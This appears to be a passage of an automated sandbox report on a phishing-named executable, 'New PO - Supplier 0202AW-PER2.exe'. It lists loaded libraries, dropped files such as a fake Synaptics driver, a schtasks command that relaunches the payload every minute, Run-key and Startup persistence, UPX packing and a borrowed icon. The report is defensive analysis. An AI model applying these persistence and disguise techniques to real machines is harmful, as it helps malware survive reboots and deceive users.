                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: QHCPYO.lnk.1.drLNK file: ..\..\..\..\..\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\PhFjRSA.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: New PO - Supplier 0202AW-PER2.exeStatic file information: File size 1684992 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_010020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_010020B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF020C pushfd ; retf 1_2_00EF0215
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0C6CC push esi; ret 1_2_00F0C6CE
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECCB5D push edi; ret 1_2_00ECCB5F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECCC76 push esi; ret 1_2_00ECCC78
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECCE51 push esi; ret 1_2_00ECCE53
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECCF3A push edi; ret 1_2_00ECCF3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC7795 push ecx; ret 1_2_00EC77A8
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEBB9D push FFFFFF8Bh; iretd 1_2_00EEBB9F
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC26EC5 pushad ; retn 002Fh2_2_2FC26EC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC255D0 push esi; retn 002Fh2_2_2FC255DE
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC2FEEC push 00DC76FBh; ret 2_2_2FC2FEF2
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC248FF push ebp; retn 002Fh2_2_2FC2491A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC24EFD push esi; retn 002Fh2_2_2FC255DE
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC25C9D push eax; retn 002Fh2_2_2FC25C9E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C020C pushfd ; retf 9_2_000C0215
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DC6CC push esi; ret 9_2_000DC6CE
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009CB5D push edi; ret 9_2_0009CB5F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009CC76 push esi; ret 9_2_0009CC78
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009CE51 push esi; ret 9_2_0009CE53
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009CF3A push edi; ret 9_2_0009CF3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00097795 push ecx; ret 9_2_000977A8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BBB9D push FFFFFF8Bh; iretd 9_2_000BBB9F
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\ProgramData\Synaptics\RCX76FB.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeJump to dropped file
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\ProgramData\Synaptics\RCX76FB.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnkJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnkJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QHCPYOJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QHCPYOJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00EBF78E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F07F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00F07F0E
